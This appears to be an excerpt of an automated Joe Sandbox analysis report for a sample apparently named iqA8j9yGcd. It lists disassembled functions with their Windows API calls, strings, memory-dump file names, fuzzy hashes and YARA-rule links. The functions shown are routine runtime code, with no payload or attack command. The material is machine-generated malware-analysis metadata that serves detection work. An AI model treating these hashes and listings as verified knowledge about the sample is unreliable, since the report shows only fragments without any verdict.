RtlUnwindEx.KERNEL32 ref: 00007FF72B8DD764

Strings

csm, xrefs: 00007FF72B8DD6F1

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction ID: b9ba2a939700982c240979d454e32c1e7b005d028cadfdb5f512aef57cefe1c0
Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction Fuzzy Hash: C151C132B19603CADB54AB2DD804638B791EB45B88FD08132EA5D47764EF3CE861CB90

Function 00007FF72B8DF288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF72B8DF2B0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF72B8DF398

Strings

csm, xrefs: 00007FF72B8DF2D2
csm, xrefs: 00007FF72B8DF3EA

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction ID: 90b24a8e029d1a2c1797cb6916da6ff2096a10661c5fcd9286cd170d62d0b880
Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction Fuzzy Hash: BE51933260828386EB64AF39D884268B791FB55B98FD44137DA4C47BA5CF3CE460DF91

Function 00007FF72B8DEED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF72B8DEF37
_CallSETranslator.LIBVCRUNTIME ref: 00007FF72B8DEF83

Strings

RCC, xrefs: 00007FF72B8DEF53
MOC, xrefs: 00007FF72B8DEF4B

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction ID: 8c216d8d2cd4996ecf3d320dcb378c7ce33d23b7fcdd028aec225f2a42475322
Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction Fuzzy Hash: 71618532908BC685DB719B29E8407A9F7A0FB85794F844626EB9C03765DF7CD1A0CF50

Function 00007FF8BA244060 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BA2469C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425CE), ref: 00007FF8BA2469CE

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA244157
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF8BA244167

Strings

csm, xrefs: 00007FF8BA2440AA
csm, xrefs: 00007FF8BA2441B9

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: Frameabort$EmptyHandler3::StateUnwind
String ID: csm$csm
API String ID: 4108983575-3733052814
Opcode ID: d96c539858820a31a9c1340fe1861477bc26c032fcc487563b75466d3052f7d1
Instruction ID: 9f6dde63553078fec26d2ca7694e5232b5b0a0db3daba5cfad24b7fb979d82ba
Opcode Fuzzy Hash: d96c539858820a31a9c1340fe1861477bc26c032fcc487563b75466d3052f7d1
Instruction Fuzzy Hash: F7515C369086838BEF648B19945426876A0FB95FD9F148276DF9C47B95CF3CE460EB00

Function 00007FF8BA24F040 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF8BA24F100
RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FF8BA24EE05), ref: 00007FF8BA24F14F

Strings

csm, xrefs: 00007FF8BA24F0E6
f, xrefs: 00007FF8BA24F07E

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind
String ID: csm$f
API String ID: 451473138-629598281
Opcode ID: 85b5fcb7b97597723a806be8e626fa0e1197ae9fcad6cd090af730aec85bac0a
Instruction ID: 7740231db24b3fb417a2722ba2e317c017be9bd7126e5bf6aedc3f63bf4815ca
Opcode Fuzzy Hash: 85b5fcb7b97597723a806be8e626fa0e1197ae9fcad6cd090af730aec85bac0a
Instruction Fuzzy Hash: 1651AE36A096038AEB14CF19E844A6937A5FB84FD8F5081B1DF1E47788DF79E949E700

Function 00007FF8BA24AAF8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FF8BA24AB52

Strings

%lf, xrefs: 00007FF8BA24AB8D, 00007FF8BA24ABC1, 00007FF8BA24ABF1

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: NameName::
String ID: %lf
API String ID: 1333004437-2891890143
Opcode ID: 5a7c290a84f6e8b1167a4a77f7bfc329acb267dd37a995d028402671466fb2be
Instruction ID: 42fce69cf594b0a2e0a6a9d2c90dcf6b89a56c395ec74f48d0877a687f302c03
Opcode Fuzzy Hash: 5a7c290a84f6e8b1167a4a77f7bfc329acb267dd37a995d028402671466fb2be
Instruction Fuzzy Hash: 37318221A0CB8785F615DB2AE9500BAB761BF59FC0F4882B5EF9E47791DE3CE1419700

Function 00007FF72B8D7E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF72B8D352C,?,00000000,00007FF72B8D3F1B), ref: 00007FF72B8D7F32

Strings

\, xrefs: 00007FF72B8D7E97
%.*s, xrefs: 00007FF72B8D7EEB
%s%c, xrefs: 00007FF72B8D7EA4

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
Instruction ID: 7179cdc1dff43e778eecce3af55319de99ee307afeafa2d496bee81a6a01e636
Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
Instruction Fuzzy Hash: FB31D871619AC245EA21AB39EC107AAA354FF84BE0FC40232EA6D477D9DE3CD651CF50

Function 00007FF72B8D2810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF72B8D28EA

Strings

[PYI-%d:%ls] , xrefs: 00007FF72B8D2868
Error, xrefs: 00007FF72B8D28DD
ERROR, xrefs: 00007FF72B8D286F

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction ID: 4341f5ca30738c58a9179f8754f28744f15267ab1ccdfc81ff0c8991d3a40b11
Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction Fuzzy Hash: 4B21A662B18B4191E710AB68F8447EAB364FB88780FC04136EE8D57665DF3CD155CB90

Function 00007FF8BA242630 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BA2469C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425CE), ref: 00007FF8BA2469CE

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA24266E

Strings

csm, xrefs: 00007FF8BA242650
MOC, xrefs: 00007FF8BA242648
RCC, xrefs: 00007FF8BA242640

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: abortterminate
String ID: MOC$RCC$csm
API String ID: 661698970-2671469338
Opcode ID: e63037d86fd6ed08c01758bd2d278b6a49b1453d2f75febe4acf0c3d16fc865e
Instruction ID: 720875cf72d265a6042c164f850b8f6405881dbde24945ceb9ba7e24f768d97f
Opcode Fuzzy Hash: e63037d86fd6ed08c01758bd2d278b6a49b1453d2f75febe4acf0c3d16fc865e
Instruction Fuzzy Hash: D2F04932918607D2E750AF6AE28116836A5FB88FC4F0991B1DF4806296CF7CE4A0DB41

Function 00007FF72B8EC5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF72B8EC61F
WriteFile.KERNEL32 ref: 00007FF72B8EC8E7
WriteFile.KERNEL32 ref: 00007FF72B8EC92D
GetLastError.KERNEL32 ref: 00007FF72B8EC9E3

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction ID: 4f385c050b1ac2fe5a16746e0c722cac608957b1a3a53f9db8b3d68cb00aa283
Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction Fuzzy Hash: 83D12772F08A8189E711DFA9C8401AC77B1FB54798B804136EF5D97BA5DE3CD026CB50

Function 00007FF72B8ECF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72B8ECF4B), ref: 00007FF72B8ED07C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72B8ECF4B), ref: 00007FF72B8ED107

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction ID: 5bbf64303253fc9f8c5c06b8bd27981561e065d55b1430ab203aeb1210f48975
Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction Fuzzy Hash: 3291D622F1869285F750AFAD9C4027DABA0EB44788F944139EE0E566A4DF3CE455CB60

Function 00007FF8BA24A078 Relevance: 6.2, APIs: 4, Instructions: 193COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF8BA24C7AC: DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24C83D
Part of subcall function 00007FF8BA24C7AC: DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24C876
Part of subcall function 00007FF8BA24C7AC: DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24CBA2

DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24A1D3
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24A232
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24A264
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24A274

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: f8e503547d28693e7c2caa01b602f421454b5c59d39c80ab22d5e562bf931295
Instruction ID: adae3227b006618f01d82c273adc88f07b54b49e4e437e019576006573584b81
Opcode Fuzzy Hash: f8e503547d28693e7c2caa01b602f421454b5c59d39c80ab22d5e562bf931295
Instruction Fuzzy Hash: D9917822E18B9399FB118B69D8403BC3BB1BB04B88F5481B6DF4D27695DF7DA845E340

Function 00007FF72B8EF98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF72B8EFA7C
_get_daylight.LIBCMT ref: 00007FF72B8EFA8D
_get_daylight.LIBCMT ref: 00007FF72B8EFA9E
_isindst.LIBCMT ref: 00007FF72B8EFB69

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction ID: 5a7f4daf20304a41f27350cdf1ee20dece8677ceb499695c4cf74e1cd4c1f79f
Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction Fuzzy Hash: BD512672F042518AFB14EFAC8D512BCB7A1EB94358F900235ED1E56AF5DB3CA412CB90

Function 00007FF8BA24A834 Relevance: 6.1, APIs: 4, Instructions: 133COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FF8BA24A8E6
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24A8F6
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24A913

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID:
API String ID: 168861036-0
Opcode ID: 096c067aeb964192ba966c7c35baf04cde4b320096b69fd5cc1f53e0d293a66c
Instruction ID: 131386cfc974fcf7d2125e54d6206ea069990a637cde700ad6d03b19cd7c487d
Opcode Fuzzy Hash: 096c067aeb964192ba966c7c35baf04cde4b320096b69fd5cc1f53e0d293a66c
Instruction Fuzzy Hash: 4A515672A28A9699F7118F29EA413BC37A0BB44F88F5884B1DF0E17795DF39E440E700

Function 00007FF72B8E577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF72B8E57AF
GetFileInformationByHandle.KERNEL32 ref: 00007FF72B8E5811
GetLastError.KERNEL32 ref: 00007FF72B8E58A2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72B8E56B4), ref: 00007FF72B8E58EE

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
Instruction ID: 2f24abde66671557383f75fb841428b307ea6480aee86167773f731e194cab37
Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
Instruction Fuzzy Hash: 59518322E0868186F710EFB9D8503BDA7E1EB48B58F944534EE0D576A6DF3CD460CBA0

Function 00007FF8BA24CC64 Relevance: 6.1, APIs: 4, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF8BA24E728: Replicator::operator[].LIBVCRUNTIME ref: 00007FF8BA24E782

Part of subcall function 00007FF8BA24C7AC: DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24C83D
Part of subcall function 00007FF8BA24C7AC: DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24C876
Part of subcall function 00007FF8BA24C7AC: DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24CBA2

DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24CCE2
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24CCF1
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24CD6E
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24CD7D

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: Name::operator+$Replicator::operator[]
String ID:
API String ID: 3863519203-0
Opcode ID: 208b778abe9c40dc360d596873b711c1b4c9531dde43fa8ad9a0283702b0b82e
Instruction ID: a46d478f0e2ccb9e6f036fb1fd423d26a02bc6374b23b2571b33604285c9c9e1
Opcode Fuzzy Hash: 208b778abe9c40dc360d596873b711c1b4c9531dde43fa8ad9a0283702b0b82e
Instruction Fuzzy Hash: 35412376A08B8699EB01CFA8D8403AC3BB0BB48B88F5884B5DF4D57799DF78D841D750

Function 00007FF72B8D20C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF72B8D20F4
SetWindowLongPtrW.USER32 ref: 00007FF72B8D2116
GetWindowLongPtrW.USER32 ref: 00007FF72B8D2140
InvalidateRect.USER32 ref: 00007FF72B8D2160

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: 7ff1907a10a08964698fbcc74b5cd8991868b58e92a2668f9edb667ad41e2055
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: BA11A921E1C15382FA54AF7EEE442799251EF98790FC88031DB8D07BA9CD2DE4F58B51

Function 00007FF72B8DD010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF72B8DD03C
GetCurrentThreadId.KERNEL32 ref: 00007FF72B8DD04A
GetCurrentProcessId.KERNEL32 ref: 00007FF72B8DD056
QueryPerformanceCounter.KERNEL32 ref: 00007FF72B8DD066

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

